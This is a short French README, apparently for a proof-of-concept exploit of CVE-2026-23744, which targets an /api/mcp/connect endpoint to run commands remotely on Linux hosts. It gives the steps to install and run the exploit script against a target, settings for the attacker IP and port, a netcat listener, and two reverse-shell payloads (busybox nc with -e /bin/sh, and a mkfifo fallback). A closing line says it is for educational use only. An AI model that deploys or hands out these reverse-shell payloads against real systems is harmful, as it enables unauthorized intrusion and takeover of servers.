
Preuve de concept d'exploitation pour CVE-2026-23744, ciblant /api/mcp/connect pour exécuter des commandes à distance sur les systèmes Linux via un shell inversé.
PoC pour exploiter /api/mcp/connect afin d'exécuter des commandes à distance.
pip install requests
python3 exploit.py <cible>
Exemple :
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
Par défaut :
busybox nc <IP> <PORT> -e /bin/sh
Repli :
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e échoueÀ usage éducatif uniquement.